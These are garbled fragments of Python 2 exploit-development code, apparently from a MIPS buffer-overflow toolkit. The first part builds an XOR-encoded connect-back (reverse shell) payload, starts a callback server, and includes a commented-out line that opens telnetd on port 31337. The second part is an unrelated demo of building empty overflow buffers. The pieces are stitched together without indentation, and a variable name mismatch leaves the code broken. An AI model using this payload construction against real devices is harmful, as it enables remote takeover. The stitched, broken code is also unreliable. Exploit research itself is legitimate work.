#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False)
payload=CallbackPayload(connectback_host,LittleEndian)
encoded_payload=MipsXorEncoder(payload,LittleEndian,badchars=badchars)
buf.add_pattern(700-buf.len())
buf.add_string(encoded_payload.shellcode,
description="encoded connect back payload")
if len(sys.argv) == 2:
search_value=sys.argv[1]
offset=buf.find_offset(search_value)
if(offset < 0):
print "Couldn't find string %s in the overflow buffer." % search_string
else:
print "Found string %s at\noffset: %d" % (search_string,offset)
exit(0)
pid=None
pid=connectback_server.serve_connectback()
time.sleep(1)
if pid and pid > 0:
try:
addr=sys.argv[1]
port=int(sys.argv[2])
from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer
from crossbow.common.support import BigEndian
from crossbow.common.support import Logging
logger=Logging()
logger.LOG_INFO("Creating empty overflow buffer")
buf=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
buf.add_pattern(1024)
logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len())
buf.print_section_descriptions()
print buf.pretty_string()
logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4"))
logger.LOG_INFO("Creating second emtpy overflow buffer")
buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])
try:
buf2.add_pattern(128)
except Exception as e:
logger.LOG_WARN("Failed to add section.")
logger.LOG_WARN(str(e))
try:
buf2.add_string('A'*128)
